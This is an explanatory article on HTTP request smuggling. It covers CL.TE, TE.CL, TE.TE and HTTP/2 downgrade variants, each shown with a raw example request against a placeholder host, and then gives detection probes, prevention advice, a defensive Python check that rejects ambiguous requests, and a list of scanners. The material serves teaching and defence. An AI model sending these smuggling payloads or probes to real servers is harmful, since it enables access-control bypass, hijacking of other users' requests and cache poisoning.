HTTP Request Smuggling

HTTP Request Smuggling is a technique that exploits discrepancies in how front-end and back-end servers parse HTTP requests. By crafting ambiguous requests, attackers can "smuggle" a hidden request that gets interpreted differently by each server, bypassing security controls and poisoning other users' requests. The attack depends on the front-end multiplexing many clients' requests over a reused back-end connection: bytes the back-end leaves unconsumed become the prefix of whatever request arrives next on that connection, whoever sent it.

How It Works

HTTP/1.1 provides two ways to specify request body length: the Content-Length header and Transfer-Encoding: chunked. RFC 7230 says Transfer-Encoding takes precedence and Content-Length must be ignored when both are present, but implementations differ, and an obfuscated Transfer-Encoding header may be recognised by only one of the two servers, so they may disagree on where one request ends and the next begins.

Classic Smuggling Variants

CL.TE (Content-Length vs Transfer-Encoding)

POST / HTTP/1.1
Host: vulnerable.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED

Both servers receive the whole request, since the front-end's Content-Length (13 bytes) covers "0\r\n\r\nSMUGGLED". The back-end uses chunked encoding, so its body ends at the 0 chunk and "SMUGGLED" stays on the connection as the start of the next request.

TE.CL (Transfer-Encoding vs Content-Length)

POST / HTTP/1.1
Host: vulnerable.com
Content-Length: 3
Transfer-Encoding: chunked

8
SMUGGLED
0

Front-end uses chunked and forwards the whole body (a chunked body must end with the 0 chunk followed by a blank line). Back-end uses Content-Length: 3, reads only "8\r\n", and leaves "SMUGGLED\r\n0\r\n\r\n" on the connection, where it prefixes the next user's request.

TE.TE (Transfer-Encoding obfuscation)

Transfer-Encoding: chunked
Transfer-Encoding: x
Transfer-Encoding: chunked
Transfer-encoding: cow

Only one obfuscated header is needed; the lines above are separate candidates. Both servers should honor Transfer-Encoding and ignore Content-Length, but a server that does not recognise the obfuscated form (duplicate header, unknown value, unusual casing or whitespace) falls back to Content-Length, and the request degrades to CL.TE or TE.CL depending on which side failed to see it.

HTTP/2 Smuggling

# HTTP/2 to HTTP/1.1 downgrade smuggling
:method: POST
:path: /
content-length: 0

GET /admin HTTP/1.1
Host: internal

The HTTP/2 front-end frames the body by DATA frame length and ignores content-length, so it reads the whole body; when it downgrades the request to HTTP/1.1, the back-end honors content-length: 0 and treats the remaining bytes as a second request for /admin (H2.CL). A related variant relies on header injection: HTTP/2 carries header values as length-prefixed binary fields, so a value containing \r\n passes through the front-end intact and becomes extra header lines, or a premature end of headers, in the rewritten HTTP/1.1 request.

Attack Impact

  • Bypass security controls: WAF, access controls, IP restrictions
  • Request hijacking: Capture other users' requests/credentials
  • Cache poisoning: Store malicious responses for other users
  • Credential theft: Redirect users' authenticated requests
  • Web cache deception: Cache sensitive user data

Detection

# Timing-based detection
1. Send a CL.TE probe whose Content-Length stops mid-chunk (e.g. Content-Length: 4 with body "1\r\nA\r\nX"): a Content-Length front-end forwards only "1\r\nA", and a chunked back-end stalls waiting for the rest of the chunk
2. If the response is delayed or times out, the CL.TE variant is likely; try the mirror TE.CL probe only afterwards, because a TE.CL probe sent to a CL.TE system leaves a stray byte on a shared back-end connection and disrupts other users

# Response-based detection
1. Smuggle a prefix that causes a distinct response (e.g. a request for a path that does not exist)
2. Immediately send a normal follow-up request; if it receives the unexpected response (e.g. a 404 for a path it never requested), the prefix was applied to it

Prevention

  • Use HTTP/2 end-to-end (no downgrading to HTTP/1.1 between front-end and back-end)
  • Configure the front-end to normalize ambiguous requests before forwarding them
  • Reject requests with both Content-Length and Transfer-Encoding, or with duplicate, malformed or obfuscated Transfer-Encoding headers
  • Use the same server software, with the same configuration, on front-end and back-end
  • Disable back-end connection reuse so leftover bytes cannot prefix another client's request (at a performance cost, and not a substitute for fixing the parsing)
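A front-end check that implements the rejection rules above and catches the TE.TE header variants shown earlier, as an added example in Python that is not code from the original page. The requests it tests are constructed from the page's examples (placeholder host vulnerable.com), and the header-name token regex follows RFC 7230's grammar; a name that fails it, such as "Transfer-Encoding " with a space before the colon, is rejected outright rather than guessed at.

```python
# Added example (not code from the original page): a front-end framing check
# that rejects ambiguous requests instead of guessing which length header wins.
# Sample requests are constructed from the page's examples.
import re

# Header-name token per RFC 7230; anything else (e.g. a trailing space before
# the colon) is a malformed name that a laxer parser might still accept.
TOKEN = re.compile(r"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")

def framing_problems(raw):
    """Return the reasons a request's body framing is ambiguous ([] means accept).

    Accepted requests carry at most one length indicator: a single
    Content-Length, or a single Transfer-Encoding whose value is exactly
    "chunked", never both.
    """
    head, sep, _body = raw.partition(b"\r\n\r\n")
    if not sep:
        return ["incomplete header block"]
    problems = []
    if b"\n" in head.replace(b"\r\n", b""):
        problems.append("bare LF inside headers")          # lax parsers treat LF as a line end
    cl_values, te_values = [], []
    for line in head.split(b"\r\n")[1:]:
        if line[:1] in (b" ", b"\t"):
            problems.append("obsolete line folding")        # continuation lines can hide a header
            continue
        name, _, value = line.partition(b":")
        if not TOKEN.match(name.decode("latin-1")):
            problems.append(f"malformed header name {name!r}")
            continue
        if name.lower() == b"content-length":
            cl_values.append(value.strip())
        elif name.lower() == b"transfer-encoding":
            te_values.append(value.strip())
    if cl_values and te_values:
        problems.append("both Content-Length and Transfer-Encoding present")
    if len(set(cl_values)) > 1:
        problems.append("conflicting Content-Length values")
    problems += [f"non-numeric Content-Length {v!r}" for v in cl_values if not v.isdigit()]
    if len(te_values) > 1:
        problems.append("multiple Transfer-Encoding headers")
    problems += [f"unrecognised Transfer-Encoding {v!r}" for v in te_values if v != b"chunked"]
    return problems

# Constructed samples: a clean request, the page's CL.TE request, the page's
# TE.TE header set, and a header name obfuscated with a space before the colon.
CLEAN = b"POST / HTTP/1.1\r\nHost: vulnerable.com\r\nContent-Length: 5\r\n\r\nhello"
CL_TE = (b"POST / HTTP/1.1\r\nHost: vulnerable.com\r\nContent-Length: 13\r\n"
         b"Transfer-Encoding: chunked\r\n\r\n0\r\n\r\nSMUGGLED")
TE_TE = (b"POST / HTTP/1.1\r\nHost: vulnerable.com\r\nTransfer-Encoding: chunked\r\n"
         b"Transfer-Encoding: x\r\nTransfer-Encoding: chunked\r\nTransfer-encoding: cow\r\n\r\n")
SPACE_NAME = (b"POST / HTTP/1.1\r\nHost: vulnerable.com\r\nContent-Length: 4\r\n"
              b"Transfer-Encoding : chunked\r\n\r\n1\r\nA")

if __name__ == "__main__":
    for label, raw in [("clean", CLEAN), ("CL.TE", CL_TE), ("TE.TE", TE_TE), ("space", SPACE_NAME)]:
        print(label, framing_problems(raw) or "accept")
```

The check is deliberately strict: it never tries to decide which of two conflicting headers the back-end would honor, because that decision is exactly what the back-end may make differently. Rejecting the request (with a close of the client connection, so nothing is left queued) is the safe outcome.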

Tools

  • smuggler - HTTP Request Smuggling scanner
  • Burp Suite's HTTP Request Smuggler extension

See Also